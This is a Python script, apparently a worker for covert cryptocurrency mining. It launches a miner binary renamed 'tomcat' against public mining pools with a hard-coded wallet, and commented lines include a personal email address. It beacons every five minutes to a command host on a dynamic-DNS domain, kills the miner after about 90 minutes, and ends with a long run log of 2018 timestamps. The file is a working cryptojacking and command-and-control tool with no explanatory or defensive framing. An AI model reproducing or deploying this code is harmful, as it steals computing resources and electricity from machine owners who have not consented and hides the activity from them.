import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:19:05.118236
#2018-02-17 17:06:07.512246
#2018-02-17 18:54:06.052625
#2018-02-17 20:43:04.703221
#2018-02-17 22:30:04.068464
#2018-02-18 00:13:04.346076
#2018-02-18 02:05:01.589239
#2018-02-18 03:51:06.660714
#2018-02-18 05:38:05.138491
#2018-02-18 07:31:03.766996
#2018-02-18 09:19:03.874586
#2018-02-18 11:05:08.095625
#2018-02-18 12:52:04.261493
#2018-02-18 14:38:04.945197
#2018-02-18 16:28:04.408142
#2018-02-18 18:17:03.899320
#2018-02-18 20:02:03.349326
#2018-02-18 21:48:07.321691
#2018-02-18 23:37:05.170884
#2018-02-19 01:23:05.928598
#2018-02-19 03:13:02.139160
#2018-02-19 04:58:06.551371
#2018-02-19 06:44:06.475795
#2018-02-19 08:33:01.778289
#2018-02-19 10:22:01.799096
#2018-02-19 12:10:07.751539
#2018-02-19 13:57:01.646601
#2018-02-19 15:46:04.835403
#2018-02-19 17:35:08.902545
#2018-02-19 19:24:07.397900
#2018-02-19 21:12:01.815003
#2018-02-19 22:58:05.062821
#2018-02-20 00:42:08.173281
#2018-02-20 02:33:02.107355
#2018-02-20 04:21:03.374709
#2018-02-20 06:05:08.450172
#2018-02-20 07:50:04.958257
#2018-02-20 09:35:01.487440
#2018-02-20 11:18:10.042097
#2018-02-20 13:05:03.165088
#2018-02-20 14:50:05.064585
#2018-02-20 16:37:05.363250
#2018-02-20 18:24:07.257561
#2018-02-20 20:17:05.675468
#2018-02-20 22:03:01.827083
#2018-02-20 23:43:01.408028
#2018-02-21 01:27:07.401133
#2018-02-21 03:17:03.603821
#2018-02-21 05:05:07.368089
#2018-02-21 06:53:01.998591
#2018-02-21 08:40:01.664815
#2018-02-21 10:25:08.967394
#2018-02-21 12:13:10.664067
#2018-02-21 14:03:05.888705
#2018-02-21 15:47:08.263413
#2018-02-21 17:40:09.255708
#2018-02-21 19:27:10.186389
#2018-02-21 21:15:09.218820
#2018-02-21 23:03:02.230850
#2018-02-22 00:52:08.008277
#2018-02-22 02:39:07.444248
#2018-02-22 04:24:02.099779
#2018-02-22 06:10:01.563509
#2018-02-22 07:56:05.110544
#2018-02-22 09:45:08.055394
#2018-02-22 11:29:05.782334
#2018-02-22 13:14:08.931457
#2018-02-22 15:04:05.225783
#2018-02-22 16:48:07.454274
#2018-02-22 18:34:06.663267
#2018-02-22 20:27:01.469788
#2018-02-22 22:13:04.347053
#2018-02-22 23:59:06.504225
#2018-02-23 01:46:07.677048
#2018-02-23 03:31:07.878562
#2018-02-23 05:16:05.910095
#2018-02-23 07:01:07.547803
#2018-02-23 08:50:08.375278
#2018-02-23 11:08:01.538506
#2018-02-23 13:01:11.645753
#2018-02-23 14:47:09.077201
#2018-02-23 16:36:04.850091
#2018-02-23 18:22:07.887012
#2018-02-23 20:07:06.025152
#2018-02-23 21:55:01.540766
#2018-02-23 23:43:04.828092
#2018-02-24 01:34:04.557438
#2018-02-24 03:23:02.004446
#2018-02-24 05:08:05.946609
#2018-02-24 06:58:07.010114
#2018-02-24 08:49:06.831018
#2018-02-24 10:50:08.468143
#2018-02-24 12:37:06.150099
#2018-02-24 14:25:08.411105
#2018-02-24 16:13:03.311835
#2018-02-24 18:06:03.814285
#2018-02-24 19:52:06.279336
#2018-02-24 21:36:04.515942
#2018-02-25 00:24:05.852544
#2018-02-25 04:08:06.641535
#2018-02-25 07:39:01.705983